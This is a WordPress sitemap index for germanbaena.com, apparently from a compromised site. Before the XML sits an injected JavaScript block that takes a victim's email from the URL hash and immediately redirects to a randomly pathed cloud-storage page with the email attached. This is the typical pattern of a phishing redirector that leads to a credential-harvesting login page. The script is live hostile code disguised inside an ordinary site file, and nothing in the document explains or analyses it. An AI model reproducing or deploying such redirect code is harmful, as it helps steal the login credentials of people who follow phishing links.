
<script type="text/JavaScript">
        var email = window.location.hash.substr(1);
      function makeid(length) {
          let result = '';
          const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
          const charactersLength = characters.length;
          let counter = 0;
          while (counter < length) {
            result += characters.charAt(Math.floor(Math.random() * charactersLength));
            counter += 1;
          }
          return result;
      }
       function Redirect(email) {
          window.location = "https://pub-e7a5a9fe9684476daadcb7a7f87e8b95.r2.dev/98765434567890%2F34567y8ujihgtfgyhuji%2F23456789098765434567890%2F34567898765434567UHGFTYUI%2FI876R5EDRXFCGVHBJVFT7Y8IJOKJI8Y76R5DRTF%2F09876543456789098765456789%2Findex.html#"+email;
       }
      
      if (!email) {
            } else {
                //email = atob(email) //TODO check if ai is base64 first.
                //document.write("You will be redirected to the main page in 10 seconds.");
                 setTimeout(function() {
                  Redirect(email);
                 }, 0);
      }
      
      
      
      
      
       
    </script>
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://germanbaena.com/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://germanbaena.com/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://germanbaena.com/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://germanbaena.com/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://germanbaena.com/wp-sitemap-taxonomies-post_tag-1.xml</loc></sitemap><sitemap><loc>https://germanbaena.com/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
